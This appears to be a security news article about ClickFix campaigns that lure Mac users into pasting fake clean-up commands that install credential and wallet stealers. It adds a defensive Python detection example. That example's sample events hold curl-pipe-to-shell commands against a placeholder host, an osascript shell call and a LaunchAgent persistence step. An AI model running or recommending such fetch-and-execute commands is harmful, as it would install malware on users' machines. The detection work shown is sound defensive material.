Bogus Mac cleaners widen stealer threat

Mac users are being targeted by a widening ClickFix campaign that disguises malicious commands as disk-cleaning and system-maintenance advice, turning routine troubleshooting into a route for credential theft, wallet compromise and cloud-data exposure.

The attacks use pages that appear to offer help with storage optimisation, system clean-up or utility installation. Victims are instructed to copy commands into Terminal, or in some variants to trigger Apple’s Script Editor, under the impression that they are reclaiming disk space or installing trusted helper tools. Instead, the commands fetch remote scripts that install infostealers including Macsync, Shub Stealer and Atomic macOS Stealer, known as AMOS.


The shift marks a notable evolution in ClickFix tactics. Earlier campaigns often pushed disk image files that required users to download and install an application manually. The newer activity reduces dependence on traditional malware delivery by persuading the victim to run native macOS tools directly. That approach helps attackers sidestep some familiar warnings because the execution appears to originate from the user’s own action rather than from an unsolicited attachment or conventional exploit.

Once installed, the malware is designed to collect browser credentials, Keychain entries, iCloud data, documents, media files, application tokens and cryptocurrency wallet material. Some variants go further by replacing legitimate wallet applications with trojanised versions or installing persistence mechanisms that allow attackers to return to the machine. The risk is especially acute for developers, finance professionals, cryptocurrency users and employees working across mixed macOS and Windows environments.

The lures have become more polished. Fake clean-up pages imitate Apple-style language and visual cues, while other campaigns have used fake CAPTCHA checks, software repositories, search results and AI-assisted troubleshooting prompts. The common thread is simple: attackers tell users that a short command will fix a problem. The command instead becomes the infection chain.

Security researchers have also identified variants that avoid Terminal altogether. One macOS attack used the applescript URL scheme to open Script Editor from the browser, presenting a pre-filled script that appeared to perform storage optimisation. This tactic matters because Apple has added more friction around commands pasted into Terminal, pushing attackers to test alternative execution paths while keeping the social-engineering pitch intact.

The technique’s effectiveness lies in its low technical barrier. ClickFix does not need a zero-day vulnerability or a complex phishing attachment. It exploits trust in familiar troubleshooting workflows and the perception that macOS remains safer than other operating systems. That perception is increasingly outdated as commercial stealer kits for macOS mature and become easier for criminal groups to deploy.

Macsync and Shub Stealer have shown signs of iterative development, with operators adding evasion, tracking and persistence features. AMOS has already been widely used in campaigns targeting cryptocurrency users, software developers and online-service accounts. The appearance of multiple malware families in similar ClickFix chains suggests that the delivery model is being adopted as a reusable access method rather than a one-off tactic.

The campaign also highlights the role of popular content and hosting platforms in modern malware distribution. Attackers benefit when malicious instructions are placed where users expect technical guidance, whether through cloned help pages, poisoned search results, fake project repositories or pages mimicking verification services. The command may be the payload trigger, but the surrounding page supplies the credibility.

For organisations, the threat complicates user training. Traditional warnings about suspicious attachments and unknown downloads are no longer sufficient when the user is told to run a command as part of a supposed fix. Endpoint monitoring needs to pay closer attention to unusual use of curl, bash, zsh, osascript, AppleScript, LaunchAgents and scripts writing binaries to temporary directories. Network telemetry can also help flag connections to newly registered domains or command-and-control infrastructure after a user visits a troubleshooting page.
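As an added illustration of the endpoint-monitoring point above (example code written for this page, not from the article or any vendor product), the following triage logic runs four detection rules over a constructed, simplified EDR-style process timeline: a shell launched from Terminal or Script Editor that pipes remote content into a shell, osascript running a shell command, files dropped into temporary directories, and a LaunchAgent written by a shell. The event shape, process names and sample command lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

# Minimal EDR-style process record (constructed for this example, not real telemetry).
@dataclass
class Event:
    parent: str     # parent process name
    image: str      # process name
    cmdline: str    # full command line
    writes: list = field(default_factory=list)  # files the process created

SHELLS = {"sh", "bash", "zsh"}
USER_LAUNCHERS = {"Terminal", "Script Editor", "osascript"}
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")
TMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/")

def triage(ev: Event) -> list[str]:
    """Return the names of the detection rules that fire for one event."""
    hits = []
    # 1. A shell started from the user's own tooling that pipes remote content into a shell.
    if (ev.image in SHELLS and ev.parent in USER_LAUNCHERS
            and FETCH.search(ev.cmdline) and PIPE_TO_SHELL.search(ev.cmdline)):
        hits.append("remote_script_piped_to_shell")
    # 2. AppleScript used as the execution path instead of Terminal.
    if ev.image == "osascript" and "do shell script" in ev.cmdline:
        hits.append("osascript_do_shell_script")
    # 3. A shell or downloader dropping files into a temporary directory.
    if ev.image in SHELLS | {"curl"} and any(p.startswith(TMP_DIRS) for p in ev.writes):
        hits.append("payload_written_to_tmp")
    # 4. Persistence: a LaunchAgent plist written by a shell rather than an installer.
    if ev.image in SHELLS and any("/Library/LaunchAgents/" in p and p.endswith(".plist")
                                  for p in ev.writes):
        hits.append("launchagent_written_by_shell")
    return hits

def triage_all(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> fired rules, omitting events where nothing fired."""
    return {i: h for i, ev in enumerate(events) if (h := triage(ev))}

# Constructed sample timeline: one benign clean-up check, then a ClickFix-style chain.
SAMPLE = [
    Event("Terminal", "zsh", "zsh -c 'du -sh ~/Library/Caches'"),
    Event("Terminal", "bash", "bash -c 'curl -fsSL https://example.invalid/clean.sh | bash'",
          writes=["/tmp/.helper"]),
    Event("Script Editor", "osascript",
          "osascript -e 'do shell script \"curl -s https://example.invalid/o | sh\"'"),
    Event("bash", "bash", "bash -c 'cp /tmp/.helper ~/Library/LaunchAgents/x.plist'",
          writes=["/Users/alice/Library/LaunchAgents/x.plist"]),
]
```

Calling `triage_all(SAMPLE)` leaves the benign disk-usage check silent and flags the three stages of the constructed chain separately, which is the granularity an analyst needs to tell a user-initiated clean-up from a fetch-and-execute followed by persistence.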

Apple’s expanding security controls add friction, but the campaign shows that attackers adapt quickly. Gatekeeper, quarantine flags and paste warnings are useful safeguards, yet they can be weakened when users are coached through the process step by step. The most reliable defence remains a combination of technical controls, browser protection, endpoint detection, least-privilege settings and clear rules against executing copied commands from web pages.
